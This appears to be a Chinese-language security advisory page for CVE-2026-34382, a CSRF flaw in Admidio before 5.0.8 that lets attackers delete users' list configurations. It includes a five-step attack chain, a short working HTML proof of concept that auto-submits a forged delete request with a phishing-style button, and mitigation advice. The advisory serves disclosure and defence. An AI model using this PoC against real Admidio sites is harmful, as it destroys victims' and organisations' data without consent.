CVE-2026-34382 CVSS 4.6 中危

CVE-2026-34382 Admidio CSRF漏洞致列表配置删除

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34382

漏洞类型

CSRF

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Admidio

漏洞概述

Admidio 5.0.0 至 5.0.8 之前版本存在跨站请求伪造（CSRF）漏洞。攻击者可诱导已认证用户访问恶意页面，利用 `mylist_function.php` 中删除模式处理程序缺乏 CSRF 令牌验证的缺陷，永久删除用户的列表配置。若受害者具有管理员权限，还可能导致组织范围内共享列表被破坏。该问题已在 5.0.8 版本中修复。

技术细节

该漏洞源于 Admidio 在 `mylist_function.php` 文件中实现的删除列表配置功能未正确实施 CSRF 防护机制。具体而言，当处理删除模式请求时，服务器端未严格验证请求来源的合法性，也未检查有效的 CSRF Token。这使得攻击者能够利用受害者的已登录状态，构造包含恶意 HTML 表单或 JavaScript 代码的网页。当受害者访问该页面时，浏览器会自动携带受害者的 Session Cookie 向服务器发送删除列表配置的请求。服务器接收到请求后，误认为是受害者本人的合法操作，从而执行永久删除逻辑。由于缺乏交互确认，攻击过程对受害者完全透明。如果受害者拥有管理员权限，攻击者甚至可以删除组织级别的共享列表，造成严重的数据完整性破坏。

攻击链分析

STEP 1

1. 侦察与准备

攻击者确定目标运行的是受影响版本的 Admidio，并获取特定列表的 ID 或通用的删除端点 URL。

STEP 2

2. 构造载荷

攻击者创建一个包含 HTML 表单的恶意网页，该表单指向 `mylist_function.php` 的删除接口，并设置好必要的参数（如 mode=delete）。

STEP 3

3. 社会工程学诱导

攻击者通过钓鱼邮件或即时通讯工具，诱导已登录 Admidio 的受害者点击恶意链接。

STEP 4

4. 请求执行

受害者浏览器在加载页面时，自动发送带有受害者会话 Cookie 的删除请求到 Admidio 服务器。

STEP 5

5. 漏洞利用

服务器未验证 CSRF Token，直接执行删除操作，导致受害者的列表配置被永久移除。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-34382 -->
<!-- Attacker hosts this file and lures the victim to access it -->
<html>
  <body>
    <form action="http://target-site/adm_program/modules/lists/mylist_function.php" method="POST">
      <input type="hidden" name="mode" value="delete" />
      <input type="hidden" name="list_id" value="1" /> <!-- Replace with a valid list ID -->
      <input type="submit" value="Click to Claim Prize!" />
    </form>
    <script>
      // Auto-submit the form to minimize interaction
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Admidio >= 5.0.0, < 5.0.8

防御指南

临时缓解措施

在无法立即升级的情况下，管理员应部署 Web 应用防火墙（WAF）规则，以检测和阻止针对 `mylist_function.php` 的可疑外部请求。此外，应严格限制管理员的网络访问权限，仅允许从受信任的内部网络访问管理后台，从而降低被钓鱼攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表